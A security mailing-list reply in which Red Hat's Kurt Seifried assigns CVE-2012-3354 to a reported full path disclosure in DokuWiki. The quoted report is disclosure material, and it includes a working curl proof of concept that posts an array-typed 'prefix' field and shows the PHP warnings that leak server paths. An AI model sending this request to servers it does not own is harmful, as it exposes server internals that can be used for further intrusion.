Re: CVE request: Full path disclosure in DokuWiki

[Kurt Seifried <kseifried () redhat com>]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 06/24/2012 06:40 AM, Felipe Pena wrote:
> Full path disclosure in DokuWiki 
> ======================================== DokuWiki is a simple to
> use Wiki aimed at the documentation needs of a small company. It
> works on plain text files and thus needs no database. It has a 
> simple but powerful syntax which makes sure the datafiles remain
> readable outside the Wiki.
>
> The POST input 'prefix' is not checked/casted for proper data type
> before passing to PHP's substr() function, which lead to displays
> an warning with sensitive information on server with PHP error
> level enabled:
>
> $PRE   = cleanText(substr($_POST['prefix'], 0, -1));
>
> $ curl -dprefix[]=1 http://localhost/dokuwiki/doku.php 2> /dev/null
> | grep Warning <b>Warning</b>:  substr() expects parameter 1 to be
> string, array given in <b>/var/www/dokuwiki/doku.php</b> on line
> <b>47</b><br /> <b>Warning</b>:  Cannot modify header information -
> headers already sent by (output started at
> /var/www/dokuwiki/doku.php:47) in 
> <b>/var/www/dokuwiki/inc/actions.php</b> on line <b>180</b><br />
>
> Affected versions: ======================================== - Angua
> (RC1) - Rincewind - Anteater
>
> References: ======================================== 
> http://www.freelists.org/post/dokuwiki/Fwd-DokuWiki-Full-path-disclosure
>
>  Credits: ======================================== This
> vulnerability was discovered by Felipe Pena. Twitter: @felipensp

Please use CVE-2012-3354 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQIcBAEBAgAGBQJP5/R9AAoJEBYNRVNeJnmTuy4QAMQ1Lde156PpN81VAVaE9XUk
vcZ6arWAvYIJzMMYlwVZlWdfhQbds4v0IbuefugnsS7XMD5/+Gn0Y07ulqTWiDMY
dQ6ESNkVvTW959S977aSullrYlF3LDgYxb48dvclza8fxQxQZRKGZ/ppHJ2+CGqn
sGwiJjF/zAQDYRiNl9+FE2aLrWjUTU1IEIwAHzPMa/jMO/XPhMVjU48JntMd1f/n
rcpUbTVByY2dFaPGpH8APFCjPlCk3fkWZCzGmGRNkZQBvGrGBFOHdbeP+zSITwd5
ksQqhzOG4X43VGMpkMREgMc9+korDplKGAjBGGHZKOGQA6ad3rjspHpnmfkyn7wY
Ug3aolQtwsOyzYBA/LRpYNZcRTYGRRSnoutjNkGaAZHjiLKixrlmv99CxubCefLf
d0q7qF1gMaZX3bY1X9cYcatKDI/26Xlr1zsDYXyQsmqNbqqsvaZ98lq3dR3r1BbD
kEIkEF2kCvB8XEtgpPni7MwyLI5vf7iFOMyVzVmgT8jvTME1dpph0aL7L0nm65Ko
YkgGk8ppC3wN2v9AC6N/fAAFUzPuCUGmIDDMqXL6/T/4Kxem0a2NzlTdxpUgQqgW
m7xs0HgdBjRpeTD8Oz0yWpirQDjplLpbNRC08ZekRn8Tuz4pjtveHuSJMNLeNPOs
vO1optUzhVkE9I0lJAuE
=gzwk
-----END PGP SIGNATURE-----